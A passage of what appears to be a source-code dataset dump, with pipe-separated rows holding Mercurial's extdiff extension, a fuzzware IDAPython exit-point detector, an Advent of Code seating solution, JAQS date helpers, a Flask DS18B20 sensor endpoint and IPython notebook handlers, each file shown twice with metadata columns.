cmd = cmd[4:]
if not path:
path = cmd
diffopts = ui.config('extdiff', 'opts.' + cmd, '')
diffopts = diffopts and [diffopts] or []
elif cmd.startswith('opts.'):
continue
else:
# command = path opts
if path:
diffopts = shlex.split(path)
path = diffopts.pop(0)
else:
path, diffopts = cmd, []
# look for diff arguments in [diff-tools] then [merge-tools]
if diffopts == []:
args = ui.config('diff-tools', cmd+'.diffargs') or \
ui.config('merge-tools', cmd+'.diffargs')
if args:
diffopts = shlex.split(args)
def save(cmd, path, diffopts):
'''use closure to save diff command to use'''
def mydiff(ui, repo, *pats, **opts):
return dodiff(ui, repo, path, diffopts + opts['option'],
pats, opts)
doc = _('''\
use %(path)s to diff repository (or selected files)
Show differences between revisions for the specified files, using
the %(path)s program.
When two revision arguments are given, then changes are shown
between those revisions. If only one revision is specified then
that revision is compared to the working directory, and, when no
revisions are specified, the working directory files are compared
to its parent.\
''') % dict(path=util.uirepr(path))
# We must translate the docstring right away since it is
# used as a format string. The string will unfortunately
# be translated again in commands.helpcmd and this will
# fail when the docstring contains non-ASCII characters.
# Decoding the string to a Unicode string here (using the
# right encoding) prevents that.
mydiff.__doc__ = doc.decode(encoding.encoding)
return mydiff
cmdtable[cmd] = (save(cmd, path, diffopts),
cmdtable['extdiff'][1][1:],
_('hg %s [OPTION]... [FILE]...') % cmd)
| # extdiff.py - external diff program support for mercurial
#
# Copyright 2006 <NAME> <<EMAIL>>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
'''command to allow external programs to compare revisions
The extdiff Mercurial extension allows you to use external programs
to compare revisions, or revision with working directory. The external
diff programs are called with a configurable set of options and two
non-option arguments: paths to directories containing snapshots of
files to compare.
The extdiff extension also allows you to configure new diff commands, so
you do not need to type :hg:`extdiff -p kdiff3` always. ::
[extdiff]
# add new command that runs GNU diff(1) in 'context diff' mode
cdiff = gdiff -Nprc5
## or the old way:
#cmd.cdiff = gdiff
#opts.cdiff = -Nprc5
# add new command called vdiff, runs kdiff3
vdiff = kdiff3
# add new command called meld, runs meld (no need to name twice)
meld =
# add new command called vimdiff, runs gvimdiff with DirDiff plugin
# (see http://www.vim.org/scripts/script.php?script_id=102) Non
# English user, be sure to put "let g:DirDiffDynamicDiffText = 1" in
# your .vimrc
vimdiff = gvim -f "+next" \\
"+execute 'DirDiff' fnameescape(argv(0)) fnameescape(argv(1))"
Tool arguments can include variables that are expanded at runtime::
$parent1, $plabel1 - filename, descriptive label of first parent
$child, $clabel - filename, descriptive label of child revision
$parent2, $plabel2 - filename, descriptive label of second parent
$root - repository root
$parent is an alias for $parent1.
The extdiff extension will look in your [diff-tools] and [merge-tools]
sections for diff tool arguments, when none are specified in [extdiff].
::
[extdiff]
kdiff3 =
[diff-tools]
kdiff3.diffargs=--L1 '$plabel1' --L2 '$clabel' $parent $child
You can use -I/-X and list of file or directory names like normal
:hg:`diff` command. The extdiff extension makes snapshots of only
needed files, so running the external diff program will actually be
pretty fast (at least faster than having to compare the entire tree).
'''
from mercurial.i18n import _
from mercurial.node import short, nullid
from mercurial import scmutil, scmutil, util, commands, encoding
import os, shlex, shutil, tempfile, re
def snapshot(ui, repo, files, node, tmproot):
'''snapshot files as of some revision
if not using snapshot, -I/-X does not work and recursive diff
in tools like kdiff3 and meld displays too many files.'''
dirname = os.path.basename(repo.root)
if dirname == "":
dirname = "root"
if node is not None:
dirname = '%s.%s' % (dirname, short(node))
base = os.path.join(tmproot, dirname)
os.mkdir(base)
if node is not None:
ui.note(_('making snapshot of %d files from rev %s\n') %
(len(files), short(node)))
else:
ui.note(_('making snapshot of %d files from working directory\n') %
(len(files)))
wopener = scmutil.opener(base)
fns_and_mtime = []
ctx = repo[node]
for fn in files:
wfn = util.pconvert(fn)
if not wfn in ctx:
# File doesn't exist; could be a bogus modify
continue
ui.note(' %s\n' % wfn)
dest = os.path.join(base, wfn)
fctx = ctx[wfn]
data = repo.wwritedata(wfn, fctx.data())
if 'l' in fctx.flags():
wopener.symlink(data, wfn)
else:
wopener.write(wfn, data)
if 'x' in fctx.flags():
util.setflags(dest, False, True)
if node is None:
fns_and_mtime.append((dest, repo.wjoin(fn),
os.lstat(dest).st_mtime))
return dirname, fns_and_mtime
def dodiff(ui, repo, diffcmd, diffopts, pats, opts):
'''Do the actuall diff:
- copy to a temp structure if diffing 2 internal revisions
- copy to a temp structure if diffing working revision with
another one and more than 1 file is changed
- just invoke the diff for a single file in the working dir
'''
revs = opts.get('rev')
change = opts.get('change')
args = ' '.join(diffopts)
do3way = '$parent2' in args
if revs and change:
msg = _('cannot specify --rev and --change at the same time')
raise util.Abort(msg)
elif change:
node2 = scmutil.revsingle(repo, change, None).node()
node1a, node1b = repo.changelog.parents(node2)
else:
node1a, node2 = scmutil.revpair(repo, revs)
if not revs:
node1b = repo.dirstate.p2()
else:
node1b = nullid
# Disable 3-way merge if there is only one parent
if do3way:
if node1b == nullid:
do3way = False
matcher = scmutil.match(repo[node2], pats, opts)
mod_a, add_a, rem_a = map(set, repo.status(node1a, node2, matcher)[:3])
if do3way:
mod_b, add_b, rem_b = map(set, repo.status(node1b, node2, matcher)[:3])
else:
mod_b, add_b, rem_b = set(), set(), set()
modadd = mod_a | add_a | mod_b | add_b
common = modadd | rem_a | rem_b
if not common:
return 0
tmproot = tempfile.mkdtemp(prefix='extdiff.')
try:
# Always make a copy of node1a (and node1b, if applicable)
dir1a_files = mod_a | rem_a | ((mod_b | add_b) - add_a)
dir1a = snapshot(ui, repo, dir1a_files, node1a, tmproot)[0]
rev1a = '@%d' % repo[node1a].rev()
if do3way:
dir1b_files = mod_b | rem_b | ((mod_a | add_a) - add_b)
dir1b = snapshot(ui, repo, dir1b_files, node1b, tmproot)[0]
rev1b = '@%d' % repo[node1b].rev()
else:
dir1b = None
rev1b = ''
fns_and_mtime = []
# If node2 in not the wc or there is >1 change, copy it
dir2root = ''
rev2 = ''
if node2:
dir2 = snapshot(ui, repo, modadd, node2, tmproot)[0]
rev2 = '@%d' % repo[node2].rev()
elif len(common) > 1:
#we only actually need to get the files to copy back to
#the working dir in this case (because the other cases
#are: diffing 2 revisions or single file -- in which case
#the file is already directly passed to the diff tool).
dir2, fns_and_mtime = snapshot(ui, repo, modadd, None, tmproot)
else:
# This lets the diff tool open the changed file directly
dir2 = ''
dir2root = repo.root
label1a = rev1a
label1b = rev1b
label2 = rev2
# If only one change, diff the files instead of the directories
# Handle bogus modifies correctly by checking if the files exist
if len(common) == 1:
common_file = util.localpath(common.pop())
dir1a = os.path.join(tmproot, dir1a, common_file)
label1a = common_file + rev1a
if not os.path.isfile(dir1a):
dir1a = os.devnull
if do3way:
dir1b = os.path.join(tmproot, dir1b, common_file)
label1b = common_file + rev1b
if not os.path.isfile(dir1b):
dir1b = os.devnull
dir2 = os.path.join(dir2root, dir2, common_file)
label2 = common_file + rev2
# Function to quote file/dir names in the argument string.
# When not operating in 3-way mode, an empty string is
# returned for parent2
replace = dict(parent=dir1a, parent1=dir1a, parent2=dir1b,
plabel1=label1a, plabel2=label1b,
clabel=label2, child=dir2,
root=repo.root)
def quote(match):
key = match.group()[1:]
if not do3way and key == 'parent2':
return ''
return util.shellquote(replace[key])
# Match parent2 first, so 'parent1?' will match both parent1 and parent
regex = '\$(parent2|parent1?|child|plabel1|plabel2|clabel|root)'
if not do3way and not re.search(regex, args):
args += ' $parent1 $child'
args = re.sub(regex, quote, args)
cmdline = util.shellquote(diffcmd) + ' ' + args
ui.debug('running %r in %s\n' % (cmdline, tmproot))
util.system(cmdline, cwd=tmproot, out=ui.fout)
for copy_fn, working_fn, mtime in fns_and_mtime:
if os.lstat(copy_fn).st_mtime != mtime:
ui.debug('file changed while diffing. '
'Overwriting: %s (src: %s)\n' % (working_fn, copy_fn))
util.copyfile(copy_fn, working_fn)
return 1
finally:
ui.note(_('cleaning up temp directory\n'))
shutil.rmtree(tmproot)
def extdiff(ui, repo, *pats, **opts):
'''use external program to diff repository (or selected files)
Show differences between revisions for the specified files, using
an external program. The default program used is diff, with
default options "-Npru".
To select a different program, use the -p/--program option. The
program will be passed the names of two directories to compare. To
pass additional options to the program, use -o/--option. These
will be passed before the names of the directories to compare.
When two revision arguments are given, then changes are shown
between those revisions. If only one revision is specified then
that revision is compared to the working directory, and, when no
revisions are specified, the working directory files are compared
to its parent.'''
program = opts.get('program')
option = opts.get('option')
if not program:
program = 'diff'
option = option or ['-Npru']
return dodiff(ui, repo, program, option, pats, opts)
cmdtable = {
"extdiff":
(extdiff,
[('p', 'program', '',
_('comparison program to run'), _('CMD')),
('o', 'option', [],
_('pass option to comparison program'), _('OPT')),
('r', 'rev', [],
_('revision'), _('REV')),
('c', 'change', '',
_('change made by revision'), _('REV')),
] + commands.walkopts,
_('hg extdiff [OPT]... [FILE]...')),
}
def uisetup(ui):
for cmd, path in ui.configitems('extdiff'):
if cmd.startswith('cmd.'):
cmd = cmd[4:]
if not path:
path = cmd
diffopts = ui.config('extdiff', 'opts.' + cmd, '')
diffopts = diffopts and [diffopts] or []
elif cmd.startswith('opts.'):
continue
else:
# command = path opts
if path:
diffopts = shlex.split(path)
path = diffopts.pop(0)
else:
path, diffopts = cmd, []
# look for diff arguments in [diff-tools] then [merge-tools]
if diffopts == []:
args = ui.config('diff-tools', cmd+'.diffargs') or \
ui.config('merge-tools', cmd+'.diffargs')
if args:
diffopts = shlex.split(args)
def save(cmd, path, diffopts):
'''use closure to save diff command to use'''
def mydiff(ui, repo, *pats, **opts):
return dodiff(ui, repo, path, diffopts + opts['option'],
pats, opts)
doc = _('''\
use %(path)s to diff repository (or selected files)
Show differences between revisions for the specified files, using
the %(path)s program.
When two revision arguments are given, then changes are shown
between those revisions. If only one revision is specified then
that revision is compared to the working directory, and, when no
revisions are specified, the working directory files are compared
to its parent.\
''') % dict(path=util.uirepr(path))
# We must translate the docstring right away since it is
# used as a format string. The string will unfortunately
# be translated again in commands.helpcmd and this will
# fail when the docstring contains non-ASCII characters.
# Decoding the string to a Unicode string here (using the
# right encoding) prevents that.
mydiff.__doc__ = doc.decode(encoding.encoding)
return mydiff
cmdtable[cmd] = (save(cmd, path, diffopts),
cmdtable['extdiff'][1][1:],
_('hg %s [OPTION]... [FILE]...') % cmd)
| pt | 0.143768 | 2.164653 | 2 |
scripts/idapython/idapy_detect_exitats.py | felkal/fuzzware | 106 | 13592 | import idaapi
from idaapi import *
inifinite_loops = [
b"\x00\xbf\xfd\xe7", # loop: nop; b loop
b"\xfe\xe7", # loop: b loop
]
whitelist = [
"Reset_Handler",
"main"
]
def detect_noret_funcs():
exit_locs_name_pairs = []
for func_addr in Functions():
if get_func_flags(func_addr) & idaapi.FUNC_NORET:
name = get_func_name(func_addr)
if name not in whitelist:
print("noret function: '{}' at 0x{:x}".format(name, func_addr))
exit_locs_name_pairs.append((func_addr, name))
return exit_locs_name_pairs
def detect_exit_ats(add_noret_functions=False):
# 0. find BKPTs
exit_locs = []
# 1. find noret functions if requested
if add_noret_functions:
exit_locs += detect_noret_funcs()
cnt = 0
# 2. find infinite loops and BKPT instructions
for segea in Segments():
for funcea in Functions(segea, get_segm_end(segea)):
functionName = get_func_name(funcea)
for (startea, endea) in Chunks(funcea):
for head in Heads(startea, endea):
# print(functionName, ":", "0x%08x"%(head), ":", GetDisasm(head))
for loop_code in inifinite_loops:
if get_bytes(head, len(loop_code)) == loop_code:
print("Found endless loop: 0x{:x} (function {})".format(head, functionName))
exit_locs.append((head, "endless_loop_{:02d}_{}".format(cnt, functionName)))
cnt += 1
if print_insn_mnem(head) == 'BKPT':
print("Found bkpt: 0x{:x} (function {})".format(head, functionName))
exit_locs.append((head, "bkpt_{:02d}_{}".format(cnt, functionName)))
cnt += 1
return exit_locs
def print_exit_ats(add_noret_functions=False):
exit_locs = detect_exit_ats(add_noret_functions=add_noret_functions)
print("exit_at:")
for addr, name in exit_locs:
print(" {}: 0x{:08x}".format(name, addr))
def dump_exit_ats(filename="exit_ats.yml"):
exit_locs = detect_exit_ats()
with open(filename, "w") as f:
f.write("exit_at:\n")
for addr, name in exit_locs:
f.write(" {}: 0x{:08x}\n".format(name, addr))
dump_exit_ats()
| import idaapi
from idaapi import *
inifinite_loops = [
b"\x00\xbf\xfd\xe7", # loop: nop; b loop
b"\xfe\xe7", # loop: b loop
]
whitelist = [
"Reset_Handler",
"main"
]
def detect_noret_funcs():
exit_locs_name_pairs = []
for func_addr in Functions():
if get_func_flags(func_addr) & idaapi.FUNC_NORET:
name = get_func_name(func_addr)
if name not in whitelist:
print("noret function: '{}' at 0x{:x}".format(name, func_addr))
exit_locs_name_pairs.append((func_addr, name))
return exit_locs_name_pairs
def detect_exit_ats(add_noret_functions=False):
# 0. find BKPTs
exit_locs = []
# 1. find noret functions if requested
if add_noret_functions:
exit_locs += detect_noret_funcs()
cnt = 0
# 2. find infinite loops and BKPT instructions
for segea in Segments():
for funcea in Functions(segea, get_segm_end(segea)):
functionName = get_func_name(funcea)
for (startea, endea) in Chunks(funcea):
for head in Heads(startea, endea):
# print(functionName, ":", "0x%08x"%(head), ":", GetDisasm(head))
for loop_code in inifinite_loops:
if get_bytes(head, len(loop_code)) == loop_code:
print("Found endless loop: 0x{:x} (function {})".format(head, functionName))
exit_locs.append((head, "endless_loop_{:02d}_{}".format(cnt, functionName)))
cnt += 1
if print_insn_mnem(head) == 'BKPT':
print("Found bkpt: 0x{:x} (function {})".format(head, functionName))
exit_locs.append((head, "bkpt_{:02d}_{}".format(cnt, functionName)))
cnt += 1
return exit_locs
def print_exit_ats(add_noret_functions=False):
exit_locs = detect_exit_ats(add_noret_functions=add_noret_functions)
print("exit_at:")
for addr, name in exit_locs:
print(" {}: 0x{:08x}".format(name, addr))
def dump_exit_ats(filename="exit_ats.yml"):
exit_locs = detect_exit_ats()
with open(filename, "w") as f:
f.write("exit_at:\n")
for addr, name in exit_locs:
f.write(" {}: 0x{:08x}\n".format(name, addr))
dump_exit_ats()
| en | 0.094802 | 2.390391 | 2 |
2020/src/day11.py | pantaryl/adventofcode | 2 | 13593 | <reponame>pantaryl/adventofcode
from collections import defaultdict
from helpers import memoize
from copy import deepcopy
with open("../input/day11.txt", 'r') as inputFile:
data = [x.rstrip() for x in inputFile.readlines()]
#data = [int(x) for x in data]
map = {}
yMax = len(data)
xMax = len(data[0])
for y in range(yMax):
line = data[y]
for x in range(xMax):
map[(x, y)] = line[x]
def anyAdjacentOccupied(x, y, oldMap) -> bool:
for xVals in [-1, 0, 1]:
for yVals in [-1, 0, 1]:
if xVals == 0 and yVals == 0: continue
if (xVals+x, yVals+y) in oldMap and oldMap[(xVals+x, yVals+y)] == "#":
return True
return False
def alsoOccupied(x, y, oldMap) -> bool:
count = 0
for xVals in [-1, 0, 1]:
for yVals in [-1, 0, 1]:
if xVals == 0 and yVals == 0: continue
if (xVals+x, yVals+y) in oldMap and oldMap[(xVals+x, yVals+y)] == "#":
count += 1
return count >= 4
def printMap(map):
for y in range(yMax):
for x in range(xMax):
print(map[(x, y)], end='')
print()
# Part 1
oldMap = deepcopy(map)
for i in range(5000):
changed = False
newMap = deepcopy(oldMap)
for x in range(xMax):
for y in range(yMax):
if oldMap[(x, y)] == "L" and anyAdjacentOccupied(x, y, oldMap) is False:
newMap[(x, y)] = "#"
changed = True
elif oldMap[(x, y)] == "#" and alsoOccupied(x, y, oldMap):
newMap[(x, y)] = "L"
changed = True
if changed is False:
occupied = 0
for _, value in newMap.items():
occupied += 1 if value == "#" else 0
print(occupied)
break
else:
oldMap = newMap
#printMap(oldMap)
#print()
#print()
# Part 2
def anyAdjacentOccupied2(x, y, oldMap) -> bool:
slopes = [(-1, -1), (-1, 0), (-1, 1),
(0, -1), (0, 1),
(1, -1), (1, 0), (1, 1)]
for slope in slopes:
currentXY = (x + slope[0], y + slope[1])
while currentXY in oldMap:
if oldMap[currentXY] == "L":
break
elif oldMap[currentXY] == "#":
return True
currentXY = (currentXY[0] + slope[0], currentXY[1] + slope[1])
return False
def alsoOccupied2(x, y, oldMap) -> bool:
count = 0
slopes = [(-1, -1), (-1, 0), (-1, 1),
(0, -1), (0, 1),
(1, -1), (1, 0), (1, 1)]
for slope in slopes:
currentXY = (x + slope[0], y + slope[1])
while currentXY in oldMap:
if oldMap[currentXY] == "L":
break
elif oldMap[currentXY] == "#":
count += 1
break
currentXY = (currentXY[0] + slope[0], currentXY[1] + slope[1])
return count >= 5
oldMap = deepcopy(map)
for i in range(500000):
changed = False
newMap = deepcopy(oldMap)
for x in range(xMax):
for y in range(yMax):
if oldMap[(x, y)] == "L" and anyAdjacentOccupied2(x, y, oldMap) is False:
newMap[(x, y)] = "#"
changed = True
elif oldMap[(x, y)] == "#" and alsoOccupied2(x, y, oldMap):
newMap[(x, y)] = "L"
changed = True
if changed is False:
occupied = 0
for _, value in newMap.items():
occupied += 1 if value == "#" else 0
print(occupied)
break
else:
oldMap = newMap
#printMap(oldMap)
#print()
#print()
#input() | from collections import defaultdict
from helpers import memoize
from copy import deepcopy
with open("../input/day11.txt", 'r') as inputFile:
data = [x.rstrip() for x in inputFile.readlines()]
#data = [int(x) for x in data]
map = {}
yMax = len(data)
xMax = len(data[0])
for y in range(yMax):
line = data[y]
for x in range(xMax):
map[(x, y)] = line[x]
def anyAdjacentOccupied(x, y, oldMap) -> bool:
for xVals in [-1, 0, 1]:
for yVals in [-1, 0, 1]:
if xVals == 0 and yVals == 0: continue
if (xVals+x, yVals+y) in oldMap and oldMap[(xVals+x, yVals+y)] == "#":
return True
return False
def alsoOccupied(x, y, oldMap) -> bool:
count = 0
for xVals in [-1, 0, 1]:
for yVals in [-1, 0, 1]:
if xVals == 0 and yVals == 0: continue
if (xVals+x, yVals+y) in oldMap and oldMap[(xVals+x, yVals+y)] == "#":
count += 1
return count >= 4
def printMap(map):
for y in range(yMax):
for x in range(xMax):
print(map[(x, y)], end='')
print()
# Part 1
oldMap = deepcopy(map)
for i in range(5000):
changed = False
newMap = deepcopy(oldMap)
for x in range(xMax):
for y in range(yMax):
if oldMap[(x, y)] == "L" and anyAdjacentOccupied(x, y, oldMap) is False:
newMap[(x, y)] = "#"
changed = True
elif oldMap[(x, y)] == "#" and alsoOccupied(x, y, oldMap):
newMap[(x, y)] = "L"
changed = True
if changed is False:
occupied = 0
for _, value in newMap.items():
occupied += 1 if value == "#" else 0
print(occupied)
break
else:
oldMap = newMap
#printMap(oldMap)
#print()
#print()
# Part 2
def anyAdjacentOccupied2(x, y, oldMap) -> bool:
slopes = [(-1, -1), (-1, 0), (-1, 1),
(0, -1), (0, 1),
(1, -1), (1, 0), (1, 1)]
for slope in slopes:
currentXY = (x + slope[0], y + slope[1])
while currentXY in oldMap:
if oldMap[currentXY] == "L":
break
elif oldMap[currentXY] == "#":
return True
currentXY = (currentXY[0] + slope[0], currentXY[1] + slope[1])
return False
def alsoOccupied2(x, y, oldMap) -> bool:
count = 0
slopes = [(-1, -1), (-1, 0), (-1, 1),
(0, -1), (0, 1),
(1, -1), (1, 0), (1, 1)]
for slope in slopes:
currentXY = (x + slope[0], y + slope[1])
while currentXY in oldMap:
if oldMap[currentXY] == "L":
break
elif oldMap[currentXY] == "#":
count += 1
break
currentXY = (currentXY[0] + slope[0], currentXY[1] + slope[1])
return count >= 5
oldMap = deepcopy(map)
for i in range(500000):
changed = False
newMap = deepcopy(oldMap)
for x in range(xMax):
for y in range(yMax):
if oldMap[(x, y)] == "L" and anyAdjacentOccupied2(x, y, oldMap) is False:
newMap[(x, y)] = "#"
changed = True
elif oldMap[(x, y)] == "#" and alsoOccupied2(x, y, oldMap):
newMap[(x, y)] = "L"
changed = True
if changed is False:
occupied = 0
for _, value in newMap.items():
occupied += 1 if value == "#" else 0
print(occupied)
break
else:
oldMap = newMap
#printMap(oldMap)
#print()
#print()
#input() | en | 0.343801 | 3.152649 | 3 |
jaqs/util/dtutil.py | WestXu/JAQS | 602 | 13594 | # encoding: utf-8
import datetime
import numpy as np
import pandas as pd
def get_next_period_day(current, period, n=1, extra_offset=0):
"""
Get the n'th day in next period from current day.
Parameters
----------
current : int
Current date in format "%Y%m%d".
period : str
Interval between current and next. {'day', 'week', 'month'}
n : int
n times period.
extra_offset : int
n'th business day after next period.
Returns
-------
nxt : int
"""
current_dt = convert_int_to_datetime(current)
if period == 'day':
offset = pd.tseries.offsets.BDay() # move to next business day
# offset = offsets.Day
elif period == 'week':
offset = pd.tseries.offsets.Week(weekday=0) # move to next Monday
elif period == 'month':
offset = pd.tseries.offsets.BMonthBegin() # move to first business day of next month
# offset = offsets.MonthBegin
else:
raise NotImplementedError("Frequency as {} not support".format(period))
offset = offset * n
next_dt = current_dt + offset
if extra_offset:
next_dt = next_dt + extra_offset * pd.tseries.offsets.BDay()
nxt = convert_datetime_to_int(next_dt)
return nxt
def convert_int_to_datetime(dt):
"""Convert int date (%Y%m%d) to datetime.datetime object."""
if isinstance(dt, pd.Series):
dt = dt.astype(str)
elif isinstance(dt, int):
dt = str(dt)
return pd.to_datetime(dt, format="%Y%m%d")
def convert_datetime_to_int(dt):
f = lambda x: x.year * 10000 + x.month * 100 + x.day
if isinstance(dt, (datetime.datetime, datetime.date)):
dt = pd.Timestamp(dt)
res = f(dt)
elif isinstance(dt, np.datetime64):
dt = pd.Timestamp(dt)
res = f(dt)
else:
dt = pd.Series(dt)
res = dt.apply(f)
return res
def shift(date, n_weeks=0):
"""Shift date backward or forward for n weeks.
Parameters
----------
date : int or datetime
The date to be shifted.
n_weeks : int, optional
Positive for increasing date, negative for decreasing date.
Default 0 (no shift).
Returns
-------
res : int or datetime
"""
delta = pd.Timedelta(weeks=n_weeks)
is_int = isinstance(date, (int, np.integer))
if is_int:
dt = convert_int_to_datetime(date)
else:
dt = date
res = dt + delta
if is_int:
res = convert_datetime_to_int(res)
return res
def combine_date_time(date, time):
return np.int64(date) * 1000000 + np.int64(time)
def split_date_time(dt):
date = dt // 1000000
time = dt % 1000000
return date, time
def date_to_month(ser):
# ser = pd.Series(ser)
res = ser % 10000 // 100
MONTH_MAP = {1: 'Jan',
2: 'Feb',
3: 'Mar',
4: 'Apr',
5: 'May',
6: 'Jun',
7: 'Jul',
8: 'Aug',
9: 'Sep',
10: 'Oct',
11: 'Nov',
12: 'Dec'}
# res = res.replace(MONTH_MAP)
return res
def date_to_year(ser):
return ser // 10000
| # encoding: utf-8
import datetime
import numpy as np
import pandas as pd
def get_next_period_day(current, period, n=1, extra_offset=0):
"""
Get the n'th day in next period from current day.
Parameters
----------
current : int
Current date in format "%Y%m%d".
period : str
Interval between current and next. {'day', 'week', 'month'}
n : int
n times period.
extra_offset : int
n'th business day after next period.
Returns
-------
nxt : int
"""
current_dt = convert_int_to_datetime(current)
if period == 'day':
offset = pd.tseries.offsets.BDay() # move to next business day
# offset = offsets.Day
elif period == 'week':
offset = pd.tseries.offsets.Week(weekday=0) # move to next Monday
elif period == 'month':
offset = pd.tseries.offsets.BMonthBegin() # move to first business day of next month
# offset = offsets.MonthBegin
else:
raise NotImplementedError("Frequency as {} not support".format(period))
offset = offset * n
next_dt = current_dt + offset
if extra_offset:
next_dt = next_dt + extra_offset * pd.tseries.offsets.BDay()
nxt = convert_datetime_to_int(next_dt)
return nxt
def convert_int_to_datetime(dt):
"""Convert int date (%Y%m%d) to datetime.datetime object."""
if isinstance(dt, pd.Series):
dt = dt.astype(str)
elif isinstance(dt, int):
dt = str(dt)
return pd.to_datetime(dt, format="%Y%m%d")
def convert_datetime_to_int(dt):
f = lambda x: x.year * 10000 + x.month * 100 + x.day
if isinstance(dt, (datetime.datetime, datetime.date)):
dt = pd.Timestamp(dt)
res = f(dt)
elif isinstance(dt, np.datetime64):
dt = pd.Timestamp(dt)
res = f(dt)
else:
dt = pd.Series(dt)
res = dt.apply(f)
return res
def shift(date, n_weeks=0):
"""Shift date backward or forward for n weeks.
Parameters
----------
date : int or datetime
The date to be shifted.
n_weeks : int, optional
Positive for increasing date, negative for decreasing date.
Default 0 (no shift).
Returns
-------
res : int or datetime
"""
delta = pd.Timedelta(weeks=n_weeks)
is_int = isinstance(date, (int, np.integer))
if is_int:
dt = convert_int_to_datetime(date)
else:
dt = date
res = dt + delta
if is_int:
res = convert_datetime_to_int(res)
return res
def combine_date_time(date, time):
return np.int64(date) * 1000000 + np.int64(time)
def split_date_time(dt):
date = dt // 1000000
time = dt % 1000000
return date, time
def date_to_month(ser):
# ser = pd.Series(ser)
res = ser % 10000 // 100
MONTH_MAP = {1: 'Jan',
2: 'Feb',
3: 'Mar',
4: 'Apr',
5: 'May',
6: 'Jun',
7: 'Jul',
8: 'Aug',
9: 'Sep',
10: 'Oct',
11: 'Nov',
12: 'Dec'}
# res = res.replace(MONTH_MAP)
return res
def date_to_year(ser):
return ser // 10000
| pt | 0.175261 | 3.345056 | 3 |
api/pub/sensor/ds18b20.py | rtaft/pi-sensor-dashboard | 0 | 13595 | import flask
from flask import request
import flask_restful as restful
from marshmallow import Schema, fields, validate
from api.helpers import success, created
from api.exceptions import NotFound
from sensors.ds18b20 import lookup
class DS18B20Query(restful.Resource):
    """REST resource that reports the DS18B20 one-wire sensors found on the bus."""

    def __init__(self, *args, **kwargs):
        # Sensor service arrives via kwargs -- presumably injected through
        # flask-restful's resource_class_kwargs; confirm at registration site.
        self.sensor_service = kwargs['sensor_service']

    def get(self):
        """Return the devices discovered with the service's current config."""
        config = self.sensor_service.get_config()
        return success(lookup(config))
| import flask
from flask import request
import flask_restful as restful
from marshmallow import Schema, fields, validate
from api.helpers import success, created
from api.exceptions import NotFound
from sensors.ds18b20 import lookup
class DS18B20Query (restful.Resource):
    """REST endpoint listing DS18B20 temperature sensors available on the bus."""
    def __init__(self, *args, **kwargs):
        # Dependency-injected sensor service (supplied in kwargs by the API wiring).
        self.sensor_service = kwargs['sensor_service']
    def get(self):
        # lookup() scans for DS18B20 devices using the service's current config.
        available = lookup(self.sensor_service.get_config())
        return success(available)
| none | 1 | 2.385542 | 2 |
accenv/lib/python3.4/site-packages/IPython/html/notebook/handlers.py | adamshamsudeen/clubdin-dj | 0 | 13596 | <filename>accenv/lib/python3.4/site-packages/IPython/html/notebook/handlers.py
"""Tornado handlers for the live notebook view.
Authors:
* <NAME>
"""
#-----------------------------------------------------------------------------
# Copyright (C) 2011 The IPython Development Team
#
# Distributed under the terms of the BSD License. The full license is in
# the file COPYING, distributed as part of this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
import os
from tornado import web
HTTPError = web.HTTPError
from ..base.handlers import IPythonHandler
from ..utils import url_path_join
#-----------------------------------------------------------------------------
# Handlers
#-----------------------------------------------------------------------------
class NewHandler(IPythonHandler):
    """Create a brand-new notebook and send the browser to it."""

    @web.authenticated
    def get(self):
        new_id = self.notebook_manager.new_notebook()
        target = url_path_join(self.base_project_url, new_id)
        self.redirect(target)
class NamedNotebookHandler(IPythonHandler):
    """Render the live notebook page for an existing notebook id."""

    @web.authenticated
    def get(self, notebook_id):
        # 404 early if the id is unknown to the notebook manager.
        if not self.notebook_manager.notebook_exists(notebook_id):
            raise web.HTTPError(404, 'Notebook does not exist: %s' % notebook_id)
        html = self.render_template(
            'notebook.html',
            project=self.project,
            notebook_id=notebook_id,
            kill_kernel=False,
            mathjax_url=self.mathjax_url,
        )
        self.write(html)
class NotebookRedirectHandler(IPythonHandler):
    """Map a notebook file name (foo.ipynb) to its id and redirect there."""

    @web.authenticated
    def get(self, notebook_name):
        # strip trailing .ipynb:
        notebook_name = os.path.splitext(notebook_name)[0]
        notebook_id = self.notebook_manager.rev_mapping.get(notebook_name, '')
        if not notebook_id:
            raise HTTPError(404)
        url = url_path_join(self.settings.get('base_project_url', '/'), notebook_id)
        return self.redirect(url)
class NotebookCopyHandler(IPythonHandler):
    """Duplicate an existing notebook, then redirect to the new copy."""

    @web.authenticated
    def get(self, notebook_id):
        copy_id = self.notebook_manager.copy_notebook(notebook_id)
        self.redirect(url_path_join(self.base_project_url, copy_id))
#-----------------------------------------------------------------------------
# URL to handler mappings
#-----------------------------------------------------------------------------
# Matches UUID-style notebook ids (five dash-separated \w+ groups).
_notebook_id_regex = r"(?P<notebook_id>\w+-\w+-\w+-\w+-\w+)"
# Matches notebook file names ending in .ipynb.
_notebook_name_regex = r"(?P<notebook_name>.+\.ipynb)"
# (URL pattern, handler) pairs consumed by the Tornado application setup.
default_handlers = [
    (r"/new", NewHandler),
    (r"/%s" % _notebook_id_regex, NamedNotebookHandler),
    (r"/%s" % _notebook_name_regex, NotebookRedirectHandler),
    (r"/%s/copy" % _notebook_id_regex, NotebookCopyHandler),
]
| <filename>accenv/lib/python3.4/site-packages/IPython/html/notebook/handlers.py
"""Tornado handlers for the live notebook view.
Authors:
* <NAME>
"""
#-----------------------------------------------------------------------------
# Copyright (C) 2011 The IPython Development Team
#
# Distributed under the terms of the BSD License. The full license is in
# the file COPYING, distributed as part of this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
import os
from tornado import web
HTTPError = web.HTTPError
from ..base.handlers import IPythonHandler
from ..utils import url_path_join
#-----------------------------------------------------------------------------
# Handlers
#-----------------------------------------------------------------------------
class NewHandler(IPythonHandler):
    """Create a new untitled notebook and redirect the browser to it."""
    @web.authenticated
    def get(self):
        # new_notebook() allocates a fresh notebook and returns its id.
        notebook_id = self.notebook_manager.new_notebook()
        self.redirect(url_path_join(self.base_project_url, notebook_id))
class NamedNotebookHandler(IPythonHandler):
    """Serve the live notebook view for a known notebook id."""
    @web.authenticated
    def get(self, notebook_id):
        """Render notebook.html for *notebook_id*, or raise 404 if unknown."""
        nbm = self.notebook_manager
        if not nbm.notebook_exists(notebook_id):
            raise web.HTTPError(404, 'Notebook does not exist: %s' % notebook_id)
